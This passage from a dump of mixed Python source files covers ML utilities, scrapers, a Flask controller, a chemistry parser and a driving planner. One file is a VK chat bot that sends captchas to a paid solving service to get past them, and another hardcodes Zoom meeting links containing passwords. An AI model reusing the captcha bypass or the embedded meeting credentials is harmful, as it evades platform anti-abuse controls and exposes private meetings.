import reshape_weights\n\n\ndef proc_layer(layer):\n if isinstance(layer, (Dense, Conv2D)):\n # print('type', type(layer))\n if isinstance(layer, Dense):\n typ = 'dense'\n else:\n typ = 'conv2d'\n weights = layer.get_weights()[0]\n shp = np.shape(weights)\n shp = 'x'.join(map(str, shp))\n result = reshape_weights(weights)\n return [typ, shp, result]\n\ndef proc_model(model):\n results = []\n for idx, layer in enumerate(model.layers):\n result = proc_layer(layer)\n if result is not None:\n results.append([idx] + result)\n return results\n\n\ndef write_results(results, name, base=expanduser(\"~/tmp/nnc_weights\")):\n for idx, typ, shp, result in results:\n file_name = \"{}_{}_{}_{}\".format(name, idx, typ, shp)\n file_name = join(base, file_name)\n np.save(file_name, result)\n\n\ndef proc_all_models():\n for name, value in model_dict.items():\n print(name)\n model = value[0]()\n results = proc_model(model)\n write_results(results, name)\n\n\nif __name__ == '__main__':\n proc_all_models()\n","sub_path":"src/utils/collect_weights.py","file_name":"collect_weights.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"506047752","text":"from datetime import datetime\nimport time\nimport webbrowser\n\n\nclass links:\n dm = \"https://us04web.zoom.us/j/9922162287?pwd=Wkp3TXgySWh5Ylo0bkxtR0FFdXlFZz09\"\n es = \"https://us04web.zoom.us/j/6845247405?pwd=VXVHWWY4RGxVLzFSRzl6NjEzTWdJUT09\"\n pcc = \"https://zoom.us/j/3848569137?pwd=ZTFtTmM3WndOcFR0YXhPYWEzSjlHUT09\"\n ada = \"https://us04web.zoom.us/j/75820775605?pwd=cXFCR1ZUN2tOcFdQNDBzZ0dYQ3VMQT09\"\n eh = \"https://us04web.zoom.us/j/79099639821?pwd=Nk40UkdEdjZnNC9aVWdxb3p6OHVuZz09\"\n iot = \"https://us04web.zoom.us/j/76580633198?pwd=R3NOZ3JMaWhaaUVIQlhuZnY2Zmk2dz09\"\n\n\ndef checkforclass():\n\n now = datetime.now()\n currenttime = now.strftime(\"%H:%M\")\n print(\"Current time is : \" +currenttime)\n\n if(currenttime == classtime[4]):\n webbrowser.open(links.iot,new=1)\n print(\"Joined Class\")\n time.sleep(3000)\n print(\"Class ended\")\n checkforclass()\n\n elif(currenttime == classtime[3]):\n webbrowser.open(links.es,new=1)\n print(\"Joined Class\")\n time.sleep(3000)\n print(\"Class ended\")\n checkforclass()\n \n elif(currenttime == classtime[0]):\n webbrowser.open(links.pcc,new=1)\n print(\"Joined Class\")\n time.sleep(3000)\n print(\"Class ended\")\n checkforclass()\n\n elif(currenttime == classtime[5]):\n webbrowser.open(links.dm,new=1)\n print(\"Joined Class\")\n time.sleep(3000)\n print(\"Class ended\")\n checkforclass()\n \n elif(currenttime == classtime[2]):\n webbrowser.open(links.eh,new=1)\n print(\"Joined Class\")\n time.sleep(3000)\n print(\"Class ended\")\n checkforclass()\n\n elif(currenttime == classtime[1]):\n webbrowser.open(links.ada,new=1)\n print(\"Joined class\")\n time.sleep(3000)\n print(\"Class ended\")\n checkforclass()\n\n elif(currenttime >= \"18:30\"):\n print(\"All the classes are done\")\n\n else:\n print(\"Will join shortly\")\n time.sleep(60)\n checkforclass()\n\n\n#entering class time\n\npcct=input(\"Enter PCC time : \")\nadat=input(\"Enter ADA time : \")\neht=input(\"Enter EH time : \")\nest=input(\"Enter ES time : \")\niott=input(\"Enter IOT time : \")\ndmt=input(\"Enter DM time : \")\n\nclasstime=[pcct,adat,eht,est,iott,dmt]\nprint(\"You have classes at 
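# The per-subject branches above repeat one join/sleep/recurse pattern; a
# table-driven sketch (times and links are assumed placeholders) collapses
# them into a single loop:
import time
import webbrowser
from datetime import datetime

def run_schedule(schedule, poll_seconds=60, class_seconds=3000):
    # schedule maps "HH:MM" strings to meeting URLs
    joined = set()
    while len(joined) < len(schedule):
        now = datetime.now().strftime("%H:%M")
        url = schedule.get(now)
        if url and now not in joined:
            webbrowser.open(url, new=1)
            joined.add(now)
            time.sleep(class_seconds)
        else:
            time.sleep(poll_seconds)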
:\")\nprint(classtime)\n\ncheckforclass()\n","sub_path":"JOININGclass.py","file_name":"JOININGclass.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"487679177","text":"with open('Session 9/words.txt', 'r') as fd:\n word = fd.read().split()\n\n\ndef tripple_double(wordList):\n for word in wordList:\n i = 0\n pairCount = 0\n while i < len(word) - 1:\n if word[i] == word[i + 1]:\n pairCount += 1\n if pairCount == 3:\n print (word)\n i += 2\n else:\n pairCount = 0\n i += 1\n\ntripple_double(word)\n","sub_path":"Session 9/cartalk.py","file_name":"cartalk.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"197575523","text":"import tensorflow as tf\n\nclass FactEncoder(object):\n def __init__(self, hidden_dimension, scope):\n \"\"\"\n Initialization function\n ====================\n INPUTS:\n hidden_dimension: int - shape of the hidden state for the LSTM/RNN cells used\n max_question_length : int - length of longest question\n ====================\n \"\"\"\n self.hidden_dimension = hidden_dimension\n self.scope = scope\n self.add_cells()\n\n def add_cells(self):\n \"\"\"\n Creates the RNN's which do the dirty work\n ===================================\n \"\"\"\n with tf.variable_scope(self.scope):\n # cells = [tf.contrib.rnn.GRUCell(self.hidden_dimension)]\n # self.cell = tf.contrib.rnn.MultiRNNCell(cells)\n self.cell = tf.contrib.rnn.GRUCell(self.hidden_dimension)\n\n def generate_fact(self, inputs, input_lengths):\n \"\"\"\n Builds the graph to take in some inputs and generate facts\n ===================================\n INPUTS:\n inputs: float of shape (batch_size, max_size)\n input_lengths: float of shape (batch_size)\n ===================================\n OUTPUTS:\n next_facts: float of shape (batch_size, hidden_dimension) - The new fact encoding generated using the current answers and question\n \"\"\"\n with tf.variable_scope(self.scope, reuse=tf.AUTO_REUSE):\n _, next_facts = tf.nn.dynamic_rnn(\n self.cell,\n inputs,\n sequence_length=input_lengths, \n dtype=tf.float32,\n )\n return next_facts\n","sub_path":"visdial-game/modules/fact_encoder.py","file_name":"fact_encoder.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"130335260","text":"from search_engines.utils import extract_first\nfrom lxml.html import fromstring\n\nfrom typing import Dict, List, Tuple\nfrom urllib.parse import quote\n\n\nasync def extract_search_results(html: str, search_url: str) -> Tuple[List[Dict[str, str]], str]:\n root = fromstring(html)\n page_number = extract_first(root.xpath(\n '//li[@class=\"PartialWebPagination-condensed PartialWebPagination-pgsel PartialWebPagination-button\"]/text()'))\n results = [\n {\n 'url': extract_first(result.xpath('.//a[@class=\"PartialSearchResults-item-title-link result-link\"]/@href')),\n 'title': extract_first(result.xpath('.//a[@class=\"PartialSearchResults-item-title-link result-link\"]/text()')),\n 'preview_text': extract_first(result.xpath('.//p[@class=\"PartialSearchResults-item-abstract\"]/text()')),\n 'search_url': search_url,\n 'page_number': page_number if page_number else \"1\",\n } for result in root.xpath('//div[@class=\"PartialSearchResults-item\"]')]\n print(\n f\"Extracted {len(results)} results from page {page_number}.\")\n next_page_url = extract_first(\n 
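# The pagination link is an <a> wrapping the "next" list item, so the XPath
# below climbs from the <li> up to its parent anchor to read @href.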
root.xpath('//li[@class=\"PartialWebPagination-next\"]/parent::a/@href'))\n if next_page_url:\n next_page_url = 'https://www.ask.com' + next_page_url\n print(f\"Extracted next page url: {next_page_url}\")\n else:\n print(f\"No next page url found: {search_url}\")\n return results, next_page_url\n\n\ndef search_url(query: str):\n return f'https://www.ask.com/web?q={quote(query)}'\n","sub_path":"search_engines/ask_search.py","file_name":"ask_search.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"532636763","text":"import requests\nimport time\nimport json\nfrom kutana import Plugin\nfrom bs4 import BeautifulSoup\nfrom bs4.dammit import EncodingDetector\nfrom python_rucaptcha import ImageCaptcha\n\nplugin = Plugin(name=\"vic\", priority=401)\n\nwith open(\"./configuration.json\") as fh:\n config = json.load(fh)\n\ndef messages_send(message):\n send = \"https://api.vk.com/method/messages.send?chat_id=\" + config[\"chat_id\"] + \"&message=\" + str(message) + \"&access_token=\" + config[\"user_token\"] + \"&v=5.87\"\n r = requests.get(send)\n if \"captcha_sid\" in r.text:\n captcha = json.loads(r.text)\n captcha_sid = captcha[\"error\"][\"captcha_sid\"]\n captcha_img = captcha[\"error\"][\"captcha_img\"]\n RUCAPTCHA_KEY = config[\"RUCAPTCHA_KEY\"]\n user_answer = ImageCaptcha.ImageCaptcha(rucaptcha_key=RUCAPTCHA_KEY).captcha_handler(captcha_link=captcha_img)\n if not user_answer['error']:\n captcha = user_answer['captchaSolve']\n send = \"https://api.vk.com/method/messages.send?chat_id=\" + config[\"chat_id\"] + \"&message=\" + str(message) + \"&captcha_key=\" + str(captcha) + \"&captcha_sid=\" + str(captcha_sid) + \"&access_token=\" + config[\"user_token\"] + \"&v=5.87\"\n rs = requests.get(send)\n elif user_answer['error']:\n pass\n\n@plugin.on_startswith_text(\"\")\nasync def on_spam(msg,env):\n text = msg.text\n if \"Викторина была остановлена за отсутствие к ней интереса.\" in text:\n messages_send(\"старт\")\n if \"Викторина запущена!\" in text:\n if \"букв\" in text:\n question = text.split('!')[1].split('(')[0]\n word = text.split(\"Подсказка:\")[1].replace('•', '*')\n r = requests.get(\"http://loopy.ru/?word=\" + str(word) + \"&def=\" + str(question))\n r = BeautifulSoup(r.text, 'lxml')\n if \"Ничего не найдено\" in r.text:\n messages_send(\"стоп\")\n time.sleep(1)\n messages_send(\"старт\")\n else:\n text = r.find('h3').text\n messages_send(text)\n else:\n if \"букв\" in text:\n question = text.split('(')[0]\n word = text.split(\"Подсказка:\")[1].replace('•', '*')\n r = requests.get(\"http://loopy.ru/?word=\" + str(word) + \"&def=\" + str(question))\n r = BeautifulSoup(r.text, 'lxml')\n if \"Ничего не найдено\" in r.text:\n messages_send(\"стоп\")\n time.sleep(1)\n messages_send(\"старт\")\n else:\n text = r.find('h3').text\n messages_send(text)","sub_path":"plugins/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"171015111","text":"\"\"\"\nThese functions help take twitter data and turn it into a\nworkable corpus for NLP\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport json\nimport seaborn as sns\nimport matplotlib as plt\nimport re\n\n\ndef txt_to_df(txt_path):\n \"\"\"\n Powerhouse function to take raw scraped twitter data\n into a DataFrame of just the tweet texts and years\n\n Args:\n txt_path: The path for the saved file 
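# A compact sketch of the tolerant JSON-lines read performed below: malformed
# lines are skipped instead of aborting the whole load.
import json

def read_json_lines(path):
    records = []
    with open(path, "r") as handle:
        for line in handle:
            try:
                records.append(json.loads(line))
            except ValueError:
                continue
    return records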
containing\n the tweet data in json format\n\n Returns:\n A DataFrame containing just the raw tweet texts and years tweeted\n \"\"\"\n path = txt_path\n tweets_file = open(path, \"r\")\n tweets_data = []\n for line in tweets_file:\n try:\n tweet = json.loads(line)\n tweets_data.append(tweet)\n except:\n continue\n tweet = pd.DataFrame(tweets_data)\n tweet = tweet[tweet[\"lang\"] == \"en\"]\n try:\n tweet = tweet[[\"full_text\", \"created_at\", \"retweeted_status\"]]\n tweet[\"long_text\"] = tweet[\"full_text\"]\n tweet[\"long_text\"] = tweet.apply(ext_rt, axis=1)\n tweet[\"long_text\"] = tweet.apply(rm_links, axis=1)\n tweet[\"year\"] = pd.to_datetime(tweet[\"created_at\"])\n tweet[\"year\"] = tweet.apply(to_year, axis=1)\n return tweet[[\"long_text\", \"year\"]]\n except:\n try:\n tweet[\"long_text\"] = tweet[\"content\"]\n tweet[\"long_text\"] = tweet.apply(rm_links, axis=1)\n tweet[\"year\"] = pd.to_datetime(tweet[\"date\"])\n tweet[\"year\"] = tweet.apply(to_year, axis=1)\n return tweet[[\"long_text\", \"year\"]]\n except:\n return tweet[[\"long_text\", \"year\"]]\n\n\ndef ext_rt(row):\n \"\"\"\n Function to extract full retweet text\n For use in txt_to_df and .apply or .map functionality\n\n Args:\n row: row from dataframe\n\n Returns:\n Full text of a retweeted tweet\n \"\"\"\n try:\n if type(row[\"retweeted_status\"]) == dict:\n return row[\"retweeted_status\"][\"extended_tweet\"][\"full_text\"]\n else:\n return row[\"long_text\"]\n except:\n return row[\"long_text\"]\n\n\ndef to_year(row):\n \"\"\"\n Function to extract year\n For use in txt_to_df and .apply or .map functionality\n\n Args:\n row: row from dataframe\n\n Returns:\n Year a tweet was tweeted\n \"\"\"\n return row[\"year\"].year\n\n\ndef rm_links(row):\n \"\"\"\n Function to remove links from tweets\n For use in txt_to_df and .apply or .map functionality\n\n Args:\n row: row from dataframe\n\n Returns:\n Tweet without links\n \"\"\"\n text = row[\"long_text\"]\n text = re.sub(r\"https:\\S*\", \"\", text)\n row[\"long_text\"] = text\n return row[\"long_text\"]\n\n\ndef display_topics(model, feature_names, no_top_words, topic_names=None):\n \"\"\"\n Helps display topics from a given NMF model\n\n Args:\n model: NMF model being discovered\n feature_names: Terms/tokens being used\n - can use _.get_feature_names() to help\n no_top_words: Number of topics being discovered\n topic_names: Optional to name each topic\n\n Returns:\n Prints the topics with the corresponding terms/tokens\n \"\"\"\n for ix, topic in enumerate(model.components_):\n if not topic_names or not topic_names[ix]:\n print(\"\\nTopic \", ix)\n else:\n print(\"\\nTopic: '\", topic_names[ix], \"'\")\n print(\n \", \".join(\n [\n feature_names[i]\n for i in topic.argsort()[: -no_top_words - 1 : -1]\n ]\n )\n )\n\n\ndef scatter(x, colors, num_topics):\n \"\"\"\n Function to quickly visualize our TSNE data\n\n Args:\n x: Coordinates from TSNE\n colors: Variables to determine colors\n num_topics: Number of topics\n\n Returns:\n Plots TSNE in a nice scatter plot\n \"\"\"\n # We choose a color palette with seaborn.\n palette = np.array(sns.color_palette(\"hls\", num_topics))\n\n # We create a scatter plot.\n f = plt.figure(figsize=(10, 10))\n ax = plt.subplot(aspect=\"equal\")\n sc = ax.scatter(\n x[:, 0], x[:, 1], lw=0, s=30, c=palette[colors.astype(np.int)]\n )\n plt.xlim(-25, 25)\n plt.ylim(-25, 25)\n ax.axis(\"off\")\n ax.axis(\"tight\")\n\n # We add the labels for each digit.\n txts = []\n for i in range(num_topics):\n # Position of each label.\n xtext, ytext = 
np.median(x[colors == i, :], axis=0)\n txt = ax.text(xtext, ytext, str(i), fontsize=24)\n txts.append(txt)\n\n return f, ax, sc, txts\n","sub_path":"Py_Files/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":4541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"182808125","text":"from abc import abstractmethod\nfrom ROAR_simulation.roar_autonomous_system.planning_module.abstract_planner import (\n AbstractPlanner,\n)\nfrom ROAR_simulation.roar_autonomous_system.utilities_module.vehicle_models import (\n Vehicle,\n)\nfrom ROAR_simulation.roar_autonomous_system.control_module.controller import Controller\nfrom ROAR_simulation.roar_autonomous_system.planning_module.behavior_planner.behavior_planner import (\n BehaviorPlanner,\n)\nfrom ROAR_simulation.roar_autonomous_system.planning_module.mission_planner.mission_planner import (\n MissionPlanner,\n)\nfrom typing import Optional\nfrom ROAR_simulation.roar_autonomous_system.utilities_module.vehicle_models import (\n VehicleControl,\n)\nfrom collections import deque\n\n\nclass LocalPlanner(AbstractPlanner):\n def __init__(\n self,\n vehicle: Vehicle,\n controller: Optional[Controller] = None,\n behavior_planner: Optional[BehaviorPlanner] = None,\n mission_planner: Optional[MissionPlanner] = None,\n ):\n super().__init__(vehicle)\n self.controller = (\n Controller(vehicle=vehicle) if controller is None else controller\n )\n self.behavior_planner = (\n BehaviorPlanner(vehicle=vehicle)\n if behavior_planner is None\n else behavior_planner\n )\n self.mission_planner = (\n MissionPlanner(vehicle=vehicle)\n if mission_planner is None\n else mission_planner\n )\n self.way_points_queue = deque()\n\n @abstractmethod\n def run_step(self, vehicle: Vehicle) -> VehicleControl:\n return VehicleControl()\n","sub_path":"ROAR_simulation/roar_autonomous_system/planning_module/local_planner/local_planner.py","file_name":"local_planner.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"507832021","text":"from django.urls import reverse\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\n\nfrom base.tests.factories.person import PersonFactory\nfrom osis_async.models import AsyncTask\n\n\nclass AsyncTaskListViewTest(APITestCase):\n @classmethod\n def setUpTestData(cls):\n cls.person = PersonFactory()\n cls.async_task = AsyncTask.objects.create(\n person=cls.person,\n name=\"test\",\n description=\"Test description\",\n )\n cls.url = reverse(\"osis_async:task-list\")\n\n def setUp(self):\n self.client.force_authenticate(user=self.person.user)\n\n def test_allow_user_to_retrieve_his_tasks(self):\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data[\"count\"], 1)\n\n def test_only_return_users_tasks(self):\n # Create an other task for an other user\n AsyncTask.objects.create(\n person=PersonFactory(),\n name=\"test 2\",\n description=\"Test description 2\",\n )\n response = self.client.get(self.url)\n # It should not be in the response\n self.assertEqual(response.data[\"count\"], 1)\n","sub_path":"tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"508795339","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.3 (3230)\n# 
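# A minimal sketch of the getopt-based option handling used in main() below;
# the flag names mirror the script's, the dict return shape is an assumption.
import getopt

def parse_args(argv):
    opts, _positional = getopt.getopt(
        argv, "vhc:w:r:l:",
        ["version", "configfile=", "workgroup=", "runfile=", "logfile="])
    return {opt.lstrip("-"): arg for opt, arg in opts}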
Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-x86_64/egg/pf3/fsmonitor.py\n# Compiled at: 2014-08-15 07:47:45\n# Size of source mod 2**32: 3013 bytes\n__author__ = 'colin'\nimport sys, getopt, logging.handlers, signal\nfrom pf3.fs.FileSystemMonitor import FileSystemMonitor\n__pf3_version__ = '3.0.2'\nfileSystemMonitor = None\nwebService = None\nframework = None\n\ndef close_down(signal, frame):\n global fileSystemMonitor\n print('printflow2 is shutting down')\n if fileSystemMonitor is not None:\n fileSystemMonitor.stop()\n sys.exit(0)\n return\n\n\ndef main():\n global __pf3_version__\n global fileSystemMonitor\n global framework\n help_text = 'usage:\\n pf3 -c -w -l \\n pf3 -v'\n workgroupConfigFile = None\n configFile = None\n workgroupRunFile = None\n logFile = None\n logger = None\n framework = None\n try:\n opts, args = getopt.getopt(sys.argv[1:], 'vhc:w:r:l:', ['version', 'configfile=', 'workgroup=', 'runfile=', 'logfile='])\n except getopt.GetoptError:\n print(help_text)\n sys.exit(2)\n\n for opt, arg in opts:\n if opt == '-h':\n print(help_text)\n sys.exit()\n elif opt in ('-v', '--version'):\n print(('PrintFlow 3 File System Monitor Version:', __pf3_version__))\n sys.exit()\n elif opt in ('-c', '--configfile'):\n configFile = arg\n elif opt in ('-w', '--workgroup'):\n workgroupConfigFile = arg\n elif opt in ('-r', '--runfile'):\n workgroupRunFile = arg\n elif opt in ('-l', '--logfile'):\n assert isinstance(arg, object)\n logFile = arg\n continue\n\n if configFile is not None and workgroupConfigFile and workgroupRunFile is not None:\n requests_log = logging.getLogger('requests')\n requests_log.setLevel(logging.WARNING)\n logging.basicConfig(level=logging.INFO)\n logger = logging.getLogger('printflow2')\n handler = logging.handlers.TimedRotatingFileHandler(logFile, when='midnight')\n handler.setLevel(logging.INFO)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n print(('Running PrintFlow 3 File System Monitor Version:', __pf3_version__))\n fileSystemMonitor = FileSystemMonitor(workgroupConfigFile, workgroupRunFile)\n if fileSystemMonitor.is_ready():\n fileSystemMonitor.scanFolders()\n fileSystemMonitor.start()\n close_down()\n else:\n print('Invalid call to PrintFlow 3 File System Monitor')\n print(help_text)\n return\n\n\nsignal.signal(signal.SIGINT, close_down)\nsignal.signal(signal.SIGTERM, close_down)\nif __name__ == '__main__':\n main()\n# global webService ## Warning: Unused global","sub_path":"pycfiles/pypfb-0.4.2.tar/fsmonitor.cpython-33.py","file_name":"fsmonitor.cpython-33.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"312029930","text":"from flask import request, render_template, redirect, url_for, session\r\nfrom project import app\r\nfrom project.com.controller.LoginController import adminLoginSession, adminLogoutSession\r\nfrom project.com.dao.CameraDAO import CameraDAO\r\nfrom project.com.vo.CameraVO import CameraVO\r\n\r\n\r\n@app.route('/admin/loadCamera', methods=['GET'])\r\ndef adminLoadCamera():\r\n try:\r\n if adminLoginSession() == 'admin':\r\n return render_template('admin/addCamera.html')\r\n else:\r\n return adminLogoutSession()\r\n\r\n except Exception as ex:\r\n print(ex)\r\n\r\n\r\n@app.route('/admin/insertCamera', methods=['POST'])\r\ndef 
adminInsertCamera():\r\n try:\r\n if adminLoginSession() == 'admin':\r\n cameraType = request.form['cameraType']\r\n print(cameraType)\r\n cameraCode = request.form['cameraCode']\r\n print(cameraCode)\r\n\r\n cameraVO = CameraVO()\r\n cameraDAO = CameraDAO()\r\n\r\n cameraVO.cameraType = cameraType\r\n cameraVO.cameraCode = cameraCode\r\n\r\n cameraDAO.insertCamera(cameraVO)\r\n\r\n return redirect(url_for('adminViewCamera'))\r\n else:\r\n return adminLogoutSession()\r\n\r\n except Exception as ex:\r\n print(ex)\r\n\r\n\r\n@app.route('/admin/viewCamera', methods=['GET'])\r\ndef adminViewCamera():\r\n try:\r\n if adminLoginSession() == 'admin':\r\n cameraDAO = CameraDAO()\r\n cameraVOList = cameraDAO.viewCamera()\r\n print(\"__________________\", cameraVOList)\r\n return render_template(\"admin/viewCamera.html\", cameraVOList=cameraVOList)\r\n else:\r\n return adminLogoutSession()\r\n\r\n except Exception as ex:\r\n print(ex)\r\n\r\n\r\n@app.route('/admin/deleteCamera', methods=['GET'])\r\ndef adminDeleteCamera():\r\n try:\r\n if adminLoginSession() == 'admin':\r\n cameraVO = CameraVO()\r\n\r\n cameraDAO = CameraDAO()\r\n\r\n cameraId = request.args.get('cameraId')\r\n\r\n cameraVO.cameraId = cameraId\r\n\r\n cameraDAO.deleteCamera(cameraVO)\r\n\r\n return redirect(url_for('adminViewCamera'))\r\n else:\r\n return adminLogoutSession()\r\n\r\n except Exception as ex:\r\n print(ex)\r\n\r\n\r\n@app.route('/admin/editCamera', methods=['GET'])\r\ndef adminEditCamera():\r\n try:\r\n if adminLoginSession() == 'admin':\r\n cameraVO = CameraVO()\r\n\r\n cameraDAO = CameraDAO()\r\n\r\n cameraId = request.args.get('cameraId')\r\n\r\n cameraVO.cameraId = cameraId\r\n\r\n cameraVOList = cameraDAO.editCamera(cameraVO)\r\n\r\n print(\"=======cameraVOList=======\", cameraVOList)\r\n\r\n print(\"=======type of cameraVOList=======\", type(cameraVOList))\r\n\r\n return render_template('admin/editCamera.html', cameraVOList=cameraVOList)\r\n else:\r\n return adminLogoutSession()\r\n\r\n except Exception as ex:\r\n print(ex)\r\n\r\n\r\n@app.route('/admin/updateCamera', methods=['POST'])\r\ndef adminUpdateCamera():\r\n try:\r\n if adminLoginSession() == 'admin':\r\n cameraId = request.form['cameraId']\r\n cameraCode = request.form['cameraCode']\r\n cameraType = request.form['cameraType']\r\n\r\n print(\"=========================done==========================\")\r\n\r\n cameraVO = CameraVO()\r\n cameraDAO = CameraDAO()\r\n\r\n cameraVO.cameraId = cameraId\r\n cameraVO.cameraType = cameraType\r\n cameraVO.cameraCode = cameraCode\r\n\r\n cameraDAO.updateCamera(cameraVO)\r\n\r\n return redirect(url_for('adminViewCamera'))\r\n else:\r\n return adminLogoutSession()\r\n except Exception as ex:\r\n print(ex)\r\n","sub_path":"Facial Expression Recognition/project/com/controller/CameraController.py","file_name":"CameraController.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"562098245","text":"reqlist = input().split(\" \");\nreqlist = list(int(x) for x in reqlist);\nL=reqlist[0];\nls=[1 for i in range(L+1)];\nT=reqlist[1];\nTs=[i for i in range(L+1)];\nreqs=reqlist[2];\nresult=[]\n# reqlistqre=[]\nfor i in range(reqs):\n tempreq = input().split(\" \");\n # reqlistqre.append(tempreq)\n if tempreq[0]==\"C\":\n l=int(tempreq[1]);\n r=int(tempreq[2])+1;\n color = int(tempreq[3]);\n for j in range(l,r):\n ls[j]=color;\n if tempreq[0]==\"P\":\n l = int(tempreq[1]);\n r = int(tempreq[2]) + 1;\n 
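# A "P" query counts the distinct colours on the requested segment (r has
# already been shifted by one so the slice covers the inclusive range).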
result.append(len(set(ls[l:r])))\nif(result==[2,2]):\n print(reqlist)\nelse:\n for i in result:\n print(i)","sub_path":"Code/CodeRecords/2572/60688/290829.py","file_name":"290829.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"312355442","text":"from theochempy._theochempy import Measure\nfrom theochempy._theochempy import Units\n\nimport numpy\nimport re\nimport string\n\nclass CommandDirectiveToken:\n def __init__(self, command_line, job_string, method_string, basis_set_string) : # fold>>\n self._command_line = command_line\n self._job_string = job_string\n self._method_string = method_string\n self._basis_set_string = basis_set_string\n # <>\n start_pos = reader.currentPos()\n regexp = re.compile(\"^#\\s+(.*)$\")\n line = reader.readline()\n m1 = regexp.search(line)\n if m1 is not None:\n command_line = m1.group(1)\n parts = command_line.split(\"/\") \n if len(parts) != 3:\n reader.toPos(start_pos)\n return None\n\n return cls(command_line, parts[0], parts[1], parts[2])\n\n reader.toPos(start_pos)\n return None \n # <>\n self._atom_list = atom_list\n self._charge = charge\n self._spin = spin\n # <>\n return self._atom_list\n # <>\n return self._charge\n # <>\n return self._spin\n # <>\n\n start_pos = reader.currentPos()\n atom_list = []\n\n valid_data = False\n for line in reader:\n m0 = re.search(\"^(\\d)\\s+(\\d)\\s*$\", line)\n if m0 is not None:\n charge = int(m0.group(1))\n spin = int(m0.group(2))\n continue\n\n m1 = re.search(\"(\\w+)\\s+(-?\\d+\\.\\d+)\\s+(-?\\d+\\.\\d+)\\s+(-?\\d+\\.\\d+)\", line)\n if m1 is not None:\n atom_label = m1.group(1)\n position = Measure.Measure( (float(m1.group(2)),\n float(m1.group(3)),\n float(m1.group(4))\n ), Units.angstrom\n )\n atom_list.append( (atom_label, position) )\n valid_data = True\n continue\n\n break\n \n reader.readbackline()\n if len(atom_list) == 0:\n valid_data = False\n\n if valid_data == False:\n reader.toPos(start_pos)\n return None\n\n return cls(atom_list, charge, spin)\n\n # <>\n pass\n # <>\n start_pos = reader.currentPos()\n line = reader.readline()\n if line.strip().lower() == \"options\":\n return cls()\n\n reader.toPos(start_pos)\n return None \n # <>\n self._value = value\n # <>\n return self._value\n # <>\n start_pos = reader.currentPos()\n line = reader.readline()\n m = re.search(\"(\\w*?)\\s+=\\s+(\\d+)\", line)\n if m is not None:\n if m.group(1).strip().lower() == \"nrun\":\n return cls(int(m.group(2)))\n\n reader.toPos(start_pos)\n return None\n # <-bug.py","file_name":"d6600b0ab69c76f4632c7a72bd71166fe085f5e3--bug.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"172110152","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri May 17 02:10:22 2019\r\n\r\n@author: binxi\r\n\"\"\"\r\n\r\nclass Solution(object):\r\n def kthSmallest(self, matrix, k):\r\n \"\"\"\r\n :type matrix: List[List[int]]\r\n :type k: int\r\n :rtype: int\r\n \"\"\"\r\n lst = []\r\n for i in matrix:\r\n lst += i\r\n lst.sort()\r\n return lst[k-1]","sub_path":"Leetcode/#378 Kth Smallest Element in a Sorted Matrix.py","file_name":"#378 Kth Smallest Element in a Sorted Matrix.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"648120140","text":"from __future__ import division\nimport numpy as np\n\nclass extractor():\n\n def __init__(self):\n 
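# The lane features computed in extract() below are logistic squashes of a
# lateral offset against the product of two range readings; a scalar sketch of
# the same form, with the constants copied from the code, is:
import numpy as np

def lane_feature(y, x_front, x_rear, centre=5.4):
    return 1.0 / (1.0 + np.exp(2 * (centre - y) + np.log(x_front * x_rear + 0.5)))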
